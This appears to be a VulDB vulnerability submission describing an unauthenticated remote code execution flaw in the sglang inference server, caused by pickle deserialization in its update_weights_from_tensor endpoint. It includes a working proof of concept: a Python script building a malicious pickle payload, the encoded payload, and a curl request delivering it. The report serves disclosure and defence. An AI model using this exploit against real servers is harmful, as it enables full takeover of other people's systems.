| タイトル | lmsys sglang >=0.4.6 Deserialization |
|---|
| 説明 | > Author: simonhuang ([email protected]), pjf
> Affected Products or Components
1. **Sglang**: Primarily developed by top global AI institutions such as xAI, Berkeley, ByteDance, and Meta, Sglang is currently the most widely used large model inference framework worldwide. Over millions of large model training and inference servers from xAI, Berkeley, ByteDance, Meta, Google, Microsoft, Baidu, Alibaba, and Tencent are running Sglang.
Project URL: https://github.com/sgl-project/sglang
Affected Versions: sglang >= v0.4.6
Initial Vulnerability Introduction Date: 2025-04-13
> Brief Vulnerability Description
Sglang contains a Remote Code Execution (RCE) vulnerability classified as **Critical**.
An unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the target system or obtain a reverse shell, thereby achieving full control over the affected system.
> Technical Details of the Vulnerability
1. **Technical Details**
The vulnerability arises from an insecure deserialization issue in the `/update_weights_from_tensor` endpoint of Sglang. Specifically, it exists in the file `python/sglang/srt/entrypoints/http_server.py`, line 572, in the latest `main` branch of the Sglang project. This endpoint accepts POST data in the following format:
```json
{
"serialized_named_tensors": ["base64-encoded pickle serialized string"],
"flush_cache": true
}
```
The value of `serialized_named_tensors` is subsequently deserialized using Python's `pickle` module. The arbitrary code execution vulnerability occurs during this deserialization process.
2. **Detailed Steps to Reproduce the Vulnerability**
2.1 **Target Environment Setup**
In a real-world attack scenario, the attacker would scan for servers running large model inference services. For demonstration, we will either install Sglang manually or use the official Sglang Docker image and run inference on any model (e.g., Llama or Qwen).
**Option 1: Using the Official Sglang Docker Image**
- Step (1): Pull the Docker image
```bash
docker pull lmsysorg/sglang:latest
```
- Step (2): Download the model
```bash
huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False
```
- Step (3): Start the Sglang inference service
```bash
sudo docker run --gpus "0" \
--name sglang0 \
--shm-size 32g \
-p 3456:3456 \
-v /models:/models \
--ipc=host \
lmsysorg/sglang:latest \
python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \
--served-model-name Qwen1.5-0.5B \
--tp-size 1 --mem-fraction-static 0.8 \
--host x.x.x.x --port 3456 &
```
**Option 2: Manual Installation and Inference Setup**
- Step (1): Install Sglang
```bash
pip install --upgrade pip
pip install uv
uv pip install "sglang[all]>=0.5.0rc0"
```
- Step (2): Download the model
```bash
huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False
```
- Step (3): Launch the Sglang inference server
```bash
python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \
--served-model-name Qwen1.5-0.5B \
--tp-size 1 --mem-fraction-static 0.8 \
--host x.x.x.x --port 3456 &
```
After completing either Option 1 or Option 2, the Sglang inference service will be deployed and accessible at `http://<server-ip>:3456`, where `<server-ip>` is the IP address of the server.
2.2 **Constructing the Proof of Concept (PoC)**
Use the following Python script to encode the **malicious payload**:
```python
import base64
import pickle
import os
# Define malicious class
class Malicious:
def __reduce__(self):
# Arbitrary code can be executed here; using os.system to run echo as a PoC
return (os.system, ('echo RCE-Exploit-By-Simon@360!',))
# Serialize the malicious object
malicious_data = pickle.dumps([Malicious()])
# Base64 encode the serialized payload
malicious_b64str = base64.b64encode(malicious_data)
print(malicious_b64str.decode()) # Output: gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4=
```
The output string is the exploit payload (in this example: `gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4=`).
2.3 **Executing the Attack**
Send the following HTTP POST request to the target service using `curl`:
```bash
curl --location --request POST 'http://x.x.x.x:3456/update_weights_from_tensor' \
--header 'Content-Type: application/json' \
--data-raw '{
"serialized_named_tensors": ["gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4="],
"flush_cache": true
}'
```
2.4 **Verifying Successful Code Execution**
On the server side, observe the Sglang service logs. You should see an error or log entry indicating that the `echo` command was successfully executed, with the output:
```
RCE-Exploit-By-Simon@360!
```
3. **PoC (Proof of Concept)**
The proof of concept has been fully detailed in section 2 above ("Steps to Reproduce the Vulnerability").
|
|---|
| ユーザー | hl4x7eq28 (UID 89020) |
|---|
| 送信 | 2025年08月16日 07:07 (10 月 ago) |
|---|
| モデレーション | 2025年09月09日 15:23 (24 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 323203 [lmsys sglang 0.4.6 update_weights_from_tensor main serialized_named_tensors 特権昇格] |
|---|
| ポイント | 17 |
|---|